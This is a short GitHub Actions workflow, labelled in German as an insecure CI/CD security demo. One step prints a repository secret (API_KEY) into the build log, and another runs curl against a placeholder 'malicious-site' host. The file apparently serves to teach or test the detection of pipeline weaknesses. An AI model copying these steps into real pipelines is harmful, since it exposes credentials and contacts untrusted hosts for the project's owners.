name: CI/CD Security Demo

on:
  push:
    branches:
      - main

jobs:
  insecure-build:
    runs-on: ubuntu-latest

    steps:
      - name: Checkout code
        uses: actions/checkout@v3

      - name: Verwende Secret (Demo)
        run: echo "API Key: ${{ secrets.API_KEY }}"

      - name: Unsicherer Befehl (Beispiel)
        run: curl http://malicious-site
